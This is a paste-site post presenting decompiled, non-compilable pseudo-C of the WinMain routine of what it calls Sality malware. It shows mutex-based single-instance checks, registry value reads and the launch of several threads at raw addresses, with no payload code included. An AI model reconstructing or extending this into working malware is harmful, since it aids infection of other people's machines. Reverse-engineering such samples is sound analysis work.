sality source code ;)

SUBMITTED BY: Guest

DATE: May 31, 2014, 5:58 p.m.

FORMAT: Text only

SIZE: 16.2 kB

Raw Download

HITS: 1247

Report
  1. __size32 global29 = 1;// 4 bytes
  2. unsigned int global28 = 0;
  3. __size32 global14;// 4 bytes
  5. void proc1();
  6. void proc2();
  7. void proc3();
  8. void proc4();
  10. // address: 0x40425d
  11. int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
  12. __size8 al; // r8
  13. __size32 eax; // r24
  14. __size32 eax_1; // r24{111}
  15. __size32 eax_2; // r24{515}
  16. int ebp; // r29
  17. void *ebp_1; // r29
  18. __size32 ecx; // r25
  19. union { void * x39; int x40; } ecx_1; // r25
  20. __size32 ecx_2; // r25{516}
  21. __size32 edi; // r31
  22. union { void * x13; int x14; } edi_1; // r31
  23. union { void * x17; int x18; } edi_10; // r31
  24. union { int x5; __size32 * x6; } edi_11; // r31
  25. union { int x5; __size32 * x6; } edi_12; // r31
  26. union { int x5; __size32 * x6; } edi_13; // r31
  27. union { int x5; __size8 * x6; } edi_14; // r31
  28. union { void * x19; int x20; } edi_15; // r31
  29. union { int x7; __size32 * x8; } edi_16; // r31
  30. union { int x7; __size32 * x8; } edi_17; // r31
  31. union { int x7; __size32 * x8; } edi_18; // r31
  32. union { int x7; __size8 * x8; } edi_19; // r31
  33. union { int x1; __size32 * x2; } edi_2; // r31
  34. union { void * x21; int x22; } edi_20; // r31
  35. union { int x9; __size32 * x10; } edi_21; // r31
  36. union { int x9; __size32 * x10; } edi_22; // r31
  37. union { int x9; __size32 * x10; } edi_23; // r31
  38. union { int x9; __size8 * x10; } edi_24; // r31
  39. union { void * x23; int x24; } edi_25; // r31
  40. union { int x11; __size32 * x12; } edi_26; // r31
  41. union { int x11; __size32 * x12; } edi_27; // r31
  42. union { int x11; __size32 * x12; } edi_28; // r31
  43. union { int x11; __size8 * x12; } edi_29; // r31
  44. union { int x1; __size32 * x2; } edi_3; // r31
  45. union { int x11; __size8 * x12; } edi_30; // r31
  46. union { int x1; __size32 * x2; } edi_4; // r31
  47. union { void * x15; int x16; } edi_5; // r31
  48. union { int x3; __size32 * x4; } edi_6; // r31
  49. union { int x3; __size32 * x4; } edi_7; // r31
  50. union { int x3; __size32 * x4; } edi_8; // r31
  51. union { int x3; __size8 * x4; } edi_9; // r31
  52. __size32 edx; // r26
  53. __size32 edx_1; // r26{517}
  54. __size32 *esp; // r28
  55. void *esp_1; // r28{165}
  56. void *esp_2; // r28{149}
  57. void *esp_3; // r28{105}
  58. void *esp_4; // r28{9}
  59. __size32 *esp_5; // r28{554}
  60. void *esp_6; // r28{542}
  61. __size32 esp_7; // r28{279}
  62. __size32 *esp_8; // r28{253}
  63. void *esp_9; // r28{518}
  64. int local0; // m[esp + 4]
  65. int local1; // m[esp + 8]
  66. int local10; // m[esp + 12]{105}
  67. int local11; // m[esp + 12]{279}
  68. int local12; // m[esp + 16]{105}
  69. int local13; // m[esp + 16]{279}
  70. union { __size32 * x25; int x26; } local14; // m[esp_3 - 8]{114}
  71. unsigned int local15; // m[esp_3 - 8]{109}
  72. union { __size32 * x27; int x28; } local16; // m[esp_3 - 20]{130}
  73. union { __size32 * x27; int x28; } local17; // m[esp_3 - 20]{130}
  74. unsigned int local18; // m[esp_3 - 20]{147}
  75. unsigned int local19; // m[esp_3 - 20]{141}
  76. int local2; // m[esp + 12]
  77. unsigned int local20; // m[esp_9 - 12]{194}
  78. union { __size32 * x31; int x32; } local21; // m[esp_9 - 12]{204}
  79. union { __size32 * x33; int x34; } local22; // m[esp_9 - 24]{242}
  80. unsigned int local23; // m[esp_9 - 24]{211}
  81. int local24; // m[esp - 4]{105}
  82. int local25; // m[esp - 4]{279}
  83. int local26; // m[esp - 8]{105}
  84. int local27; // m[esp - 8]{279}
  85. union { int x1; __size32 * x2; } local28; // edi_2{491}
  86. union { int x1; __size32 * x2; } local29; // edi_4{493}
  87. int local3; // m[esp + 16]
  88. union { int x3; __size32 * x4; } local30; // edi_6{495}
  89. union { int x3; __size32 * x4; } local31; // edi_8{497}
  90. union { int x5; __size32 * x6; } local32; // edi_11{499}
  91. union { int x5; __size32 * x6; } local33; // edi_13{501}
  92. union { int x7; __size32 * x8; } local34; // edi_16{503}
  93. union { int x7; __size32 * x8; } local35; // edi_18{505}
  94. union { int x9; __size32 * x10; } local36; // edi_21{507}
  95. union { int x9; __size32 * x10; } local37; // edi_23{509}
  96. union { int x11; __size32 * x12; } local38; // edi_26{511}
  97. union { int x11; __size32 * x12; } local39; // edi_28{513}
  98. __size32 local4; // m[esp - 4]
  99. __size32 local40; // eax_2{515}
  100. __size32 local41; // ecx_2{516}
  101. __size32 local42; // edx_1{517}
  102. void *local43; // esp_9{518}
  103. unsigned int local5; // m[esp - 8]
  104. int local6; // m[esp + 4]{105}
  105. int local7; // m[esp + 4]{279}
  106. int local8; // m[esp + 8]{105}
  107. int local9; // m[esp + 8]{279}
  109. edx = proc1(168, 0x12a8, esp - 4, hInstance, hPrevInstance, lpCmdLine, nCmdShow, ebp, pc); /* Warning: also results in esp_4, ebp_1, edi */
  110. *(__size32*)(esp_4 - 4) = edi;
  111. *(__size32*)(ebp_1 - 4) = 0;
  112. *(__size32*)(ebp_1 - 0xd0c) = 0;
  113. *(__size16*)(ebp_1 - 0x12a8) = 0;
  114. ecx = 99;
  115. edi_1 = ebp_1 - 0x12a6;
  116. local28 = edi_1;
  117. edi_2 = local28;
  118. local29 = edi_2;
  119. while (ecx != 0) {
  120. *(__size32*)(__size32 *)edi = 0;
  121. edi_3 = edi_2 + ( (DF == 0) ? 4 : -4);
  122. ecx = ecx - 1;
  123. local28 = edi_3;
  124. local29 = edi_3;
  125. edi_2 = local28;
  126. local29 = edi_2;
  127. }
  128. edi_4 = local29;
  129. *(__size32*)(__size32 *)edi = 0;
  130. *(__size8*)(ebp_1 - 1288) = 0;
  131. ecx = 255;
  132. edi_5 = ebp_1 - 1287;
  133. local30 = edi_5;
  134. edi_6 = local30;
  135. local31 = edi_6;
  136. while (ecx != 0) {
  137. *(__size32*)(__size32 *)edi = 0;
  138. edi_7 = edi_6 + ( (DF == 0) ? 4 : -4);
  139. ecx = ecx - 1;
  140. local30 = edi_7;
  141. local31 = edi_7;
  142. edi_6 = local30;
  143. local31 = edi_6;
  144. }
  145. edi_8 = local31;
  146. *(__size32*)(__size32 *)edi = 0;
  147. edi_9 = edi_8 + ( (DF == 0) ? 2 : -2);
  148. *(__size8*)(__size8 *)edi = 0;
  149. *(__size8*)(ebp_1 - 264) = 0;
  150. ecx = 64;
  151. edi_10 = ebp_1 - 263;
  152. local32 = edi_10;
  153. edi_11 = local32;
  154. local33 = edi_11;
  155. while (ecx != 0) {
  156. *(__size32*)(__size32 *)edi = 0;
  157. edi_12 = edi_11 + ( (DF == 0) ? 4 : -4);
  158. ecx = ecx - 1;
  159. local32 = edi_12;
  160. local33 = edi_12;
  161. edi_11 = local32;
  162. local33 = edi_11;
  163. }
  164. edi_13 = local33;
  165. *(__size32*)(__size32 *)edi = 0;
  166. edi_14 = edi_13 + ( (DF == 0) ? 2 : -2);
  167. *(__size8*)(__size8 *)edi = 0;
  168. *(__size8*)(ebp_1 - 0xd08) = 0;
  169. ecx = 255;
  170. edi_15 = ebp_1 - 0xd07;
  171. local34 = edi_15;
  172. edi_16 = local34;
  173. local35 = edi_16;
  174. while (ecx != 0) {
  175. *(__size32*)(__size32 *)edi = 0;
  176. edi_17 = edi_16 + ( (DF == 0) ? 4 : -4);
  177. ecx = ecx - 1;
  178. local34 = edi_17;
  179. local35 = edi_17;
  180. edi_16 = local34;
  181. local35 = edi_16;
  182. }
  183. edi_18 = local35;
  184. *(__size32*)(__size32 *)edi = 0;
  185. edi_19 = edi_18 + ( (DF == 0) ? 2 : -2);
  186. *(__size8*)(__size8 *)edi = 0;
  187. *(__size8*)(ebp_1 - 0x1114) = 0;
  188. ecx = 255;
  189. edi_20 = ebp_1 - 0x1113;
  190. local36 = edi_20;
  191. edi_21 = local36;
  192. local37 = edi_21;
  193. while (ecx != 0) {
  194. *(__size32*)(__size32 *)edi = 0;
  195. edi_22 = edi_21 + ( (DF == 0) ? 4 : -4);
  196. ecx = ecx - 1;
  197. local36 = edi_22;
  198. local37 = edi_22;
  199. edi_21 = local36;
  200. local37 = edi_21;
  201. }
  202. edi_23 = local37;
  203. *(__size32*)(__size32 *)edi = 0;
  204. edi_24 = edi_23 + ( (DF == 0) ? 2 : -2);
  205. *(__size8*)(__size8 *)edi = 0;
  206. *(__size8*)(ebp_1 - 0x908) = 0;
  207. ecx = 255;
  208. edi_25 = ebp_1 - 0x907;
  209. local38 = edi_25;
  210. edi_26 = local38;
  211. local39 = edi_26;
  212. while (ecx != 0) {
  213. *(__size32*)(__size32 *)edi = 0;
  214. edi_27 = edi_26 + ( (DF == 0) ? 4 : -4);
  215. ecx = ecx - 1;
  216. local38 = edi_27;
  217. local39 = edi_27;
  218. edi_26 = local38;
  219. local39 = edi_26;
  220. }
  221. edi_28 = local39;
  222. *(__size32*)(__size32 *)edi = 0;
  223. edi_29 = edi_28 + ( (DF == 0) ? 2 : -2);
  224. *(__size8*)(__size8 *)edi = 0;
  225. esp_3 = proc2(0, 0, ecx, edx, ebp_1, edi_29 + ( (DF == 0) ? 1 : -1), local0, local1, local2, local3, local4, local5, <all>, LOGICALFLAGS32(0), LOGICALFLAGS32(0), LOGICALFLAGS32(0)); /* Warning: also results in ebp_1, edi */
  226. *(__size32*)(esp_3 - 4) = 0x8002;
  227. SetErrorMode();
  228. al = (unsigned char) ebp_1 - 0x12a8;
  229. local14 = ebp_1 - 0x12a8;
  230. *(__size32*)(esp_3 - 12) = 514;
  231. WS2_32_dll_115();
  232. GetCurrentProcess();
  233. global14 = eax;
  234. *(__size32*)(esp_3 - 16) = 1024;
  235. local16 = ebp_1 - 1288;
  236. *(__size32*)(esp_3 - 24) = 0;
  237. GetModuleFileNameA(*(esp_3 - 16), *(esp_3 - 20), *(esp_3 - 24));
  238. *(__size32*)(esp_3 - 16) = 0x409970;
  239. InitializeCriticalSection(*(esp_3 - 16));
  240. *(__size32*)(esp_3 - 16) = 0x409988;
  241. InitializeCriticalSection(*(esp_3 - 16));
  242. local40 = eax;
  243. local41 = ecx;
  244. local42 = edx;
  245. local43 = esp_2;
  246. *(__size32*)(ebp_1 - 0xd10) = 0;
  247. *(__size32*)(ebp_1 - 0x1118) = 0;
  248. *(__size32*)(ebp_1 - 0xd10) = 0;
  249. eax_2 = local40;
  250. ecx_2 = local41;
  251. edx_1 = local42;
  252. esp_9 = local43;
  253. tmp1 = *(ebp_1 - 0xd10) - 1000;
  254. while (*(ebp_1 - 0xd10) < 1000) {
  255. eax = proc3(al, eax_2, ecx_2, edx_1, ebp_1, edi, local6, local8, local10, local12, local24, local26, <all>, SUBFLAGS32(*(ebp_1 - 0xd10), 1000, tmp1), tmp1 == 0, *(ebp_1 - 0xd10) < 1000); /* Warning: also results in esp_1, ebp_1, edi */
  256. local43 = esp_1;
  257. ecx = *(ebp_1 - 0xd10);
  258. ecx_2 = ecx + 1000;
  259. edx = (eax & 0xffff) % (ecx + 1000);
  260. eax = *(ebp_1 - 0x1118);
  261. eax_2 = eax + edx;
  262. al = (unsigned char) eax + edx;
  263. *(__size32*)(ebp_1 - 0x1118) = eax + edx;
  264. local40 = eax_2;
  265. local41 = ecx_2;
  266. edx = *(ebp_1 - 0xd10);
  267. edx_1 = edx + 1;
  268. *(__size32*)(ebp_1 - 0xd10) = edx + 1;
  269. local42 = edx_1;
  270. eax_2 = local40;
  271. ecx_2 = local41;
  272. edx_1 = local42;
  273. esp_9 = local43;
  274. tmp1 = *(ebp_1 - 0xd10) - 1000;
  275. }
  276. *(__size32*)(esp_9 - 4) = 0x409498;
  277. *(union { __size32 * x29; int x30; }*)(esp_9 - 8) = ebp_1 - 264;
  278. lstrcpyA();
  279. *(__size32*)(esp_9 - 12) = 0x2710;
  280. Sleep(*(esp_9 - 12));
  281. local21 = ebp_1 - 264;
  282. *(__size32*)(esp_9 - 16) = 1;
  283. *(__size32*)(esp_9 - 20) = 0;
  284. CreateMutexA();
  285. *(__size32*)(ebp_1 - 0xd14) = eax;
  286. GetLastError();
  287. if (eax != 183) {
  288. local22 = ebp_1 - 0x908;
  289. *(__size32*)(esp_9 - 28) = 0x4094a4;
  290. *(__size32*)(esp_9 - 32) = 0x4094ac;
  291. *(__size32*)(esp_9 - 36) = 0x80000001;
  292. al = proc4(al, eax, ecx, ebp_1 - 0x908, ebp_1, edi, local6, local8, local10, local12, local24, local26, <all>, SUBFLAGS32(eax, 183, eax - 183), eax - 183 == 0, eax < 183); /* Warning: also results in eax, edx, esp_8, ebp_1, edi */
  293. flags = LOGICALFLAGS32(eax);
  294. if (eax != 0) {
  295. eax = (int) *(ebp_1 - 0x908);
  296. al = (unsigned char) eax;
  297. flags = SUBFLAGS32(eax, 49, eax - 49);
  298. if (eax == 49) {
  299. global28 = 50;
  300. global29 = 0;
  301. }
  302. }
  303. *(union { void * x37; int x38; }*)(esp_8 + 12) = ebp_1 - 0x908;
  304. *(__size32*)(esp_8 + 8) = 0x4094bc;
  305. *(__size32*)(esp_8 + 4) = 0x4094c4;
  306. *(__size32*)esp_8 = 0x80000001;
  307. al = proc4(al, eax, ebp_1 - 0x908, edx, ebp_1, edi, local0, local1, local2, local3, local4, local5, <all>, flags, ZF, CF); /* Warning: also results in eax, ecx, edx, esp_7, ebp_1, edi */
  308. esp = esp_7 + 16;
  309. if (eax != 0) {
  310. edx = (int) *(ebp_1 - 0x908);
  311. if (edx == 49) {
  312. global28 = 100;
  313. global29 = 0;
  314. }
  315. }
  316. if (*0x409a28 == 0) {
  317. eax = proc3(al, eax, ecx, edx, ebp_1, edi, local7, local9, local11, local13, local25, local27, <all>, SUBFLAGS32(global28, 0, global28), global28 == 0, global28 < 0); /* Warning: also results in esp */
  318. tmpl = ( ((eax & 0xffff) < 0) ? -1 : 0) << 32 | eax & 0xffff;
  319. al = (tmpl % 1000 <= 800) ? 1 : 0;
  320. eax = 0 >> 8 & 0xffffff | (al);
  321. al = (unsigned char) eax - 1 & 0xffffffce;
  322. eax = eax - 1 >> 8 & 0xffffff | (al);
  323. global28 = eax + 100;
  324. }
  325. esp_6 = esp;
  326. *(__size32*)(esp_6 - 4) = 0;
  327. *(__size32*)(esp_6 - 8) = 0;
  328. *(__size32*)(esp_6 - 12) = 0;
  329. *(__size32*)(esp_6 - 16) = 0x401474;
  330. *(__size32*)(esp_6 - 20) = 0;
  331. *(__size32*)(esp_6 - 24) = 0;
  332. CreateThread();
  333. *(__size32*)(esp_6 - 28) = 0;
  334. *(__size32*)(esp_6 - 32) = 0;
  335. *(__size32*)(esp_6 - 36) = 0;
  336. *(__size32*)(esp_6 - 40) = 0x401b98;
  337. *(__size32*)(esp_6 - 44) = 0;
  338. *(__size32*)(esp_6 - 48) = 0;
  339. CreateThread();
  340. if (*0x409a28 != 100) {
  341. if (*0x409a28 == 50) {
  342. *(__size32*)(esp_6 - 52) = 0;
  343. *(__size32*)(esp_6 - 56) = 0;
  344. *(__size32*)(esp_6 - 60) = 0;
  345. *(__size32*)(esp_6 - 64) = 0x403eb4;
  346. *(__size32*)(esp_6 - 68) = 0;
  347. *(__size32*)(esp_6 - 72) = 0;
  348. CreateThread();
  349. }
  350. } else {
  351. *(__size32*)(esp_6 - 52) = 0;
  352. *(__size32*)(esp_6 - 56) = 0;
  353. *(__size32*)(esp_6 - 60) = 0;
  354. *(__size32*)(esp_6 - 64) = 0x402797;
  355. *(__size32*)(esp_6 - 68) = 0;
  356. *(__size32*)(esp_6 - 72) = 0;
  357. CreateThread();
  358. }
  359. esp_5 = esp;
  360. *(__size32*)(esp_5 - 4) = 0x2710;
  361. Sleep(*(esp_5 - 4));
  362. if (*0x409a24 != 0) {
  363. for(;;) {
  364. L2:
  365. local4 = 0xea60;
  366. Sleep(*(esp - 4));
  367. local4 = 0x46b4c4;
  368. InterlockedIncrement(*(esp - 4));
  369. }
  370. }
  371. if (*0x409a28 != 100) {
  372. if (*0x409a28 == 50) {
  373. global28 = 100;
  374. *(__size32*)(esp_5 - 4) = 0;
  375. *(__size32*)(esp_5 - 8) = 0;
  376. *(__size32*)(esp_5 - 12) = 0;
  377. *(__size32*)(esp_5 - 16) = 0x402797;
  378. *(__size32*)(esp_5 - 20) = 0;
  379. *(__size32*)(esp_5 - 24) = 0;
  380. CreateThread();
  381. }
  382. } else {
  383. global28 = 50;
  384. *(__size32*)(esp_5 - 4) = 0;
  385. *(__size32*)(esp_5 - 8) = 0;
  386. *(__size32*)(esp_5 - 12) = 0;
  387. *(__size32*)(esp_5 - 16) = 0x403eb4;
  388. *(__size32*)(esp_5 - 20) = 0;
  389. *(__size32*)(esp_5 - 24) = 0;
  390. CreateThread();
  391. }
  392. local4 = 0x2710;
  393. Sleep(*(esp - 4));
  394. if (*0x409a24 != 0) {
  395. goto L2;
  396. }
  397. } else {
  398. eax = *(ebp_1 - 0xd14);
  399. *(__size32*)(esp_9 - 24) = eax;
  400. ReleaseMutex();
  401. ecx = *(ebp_1 - 0xd14);
  402. *(__size32*)(esp_9 - 28) = ecx;
  403. CloseHandle(*(esp_9 - 28));
  404. }
  405. return 0;
  406. }
comments powered by Disqus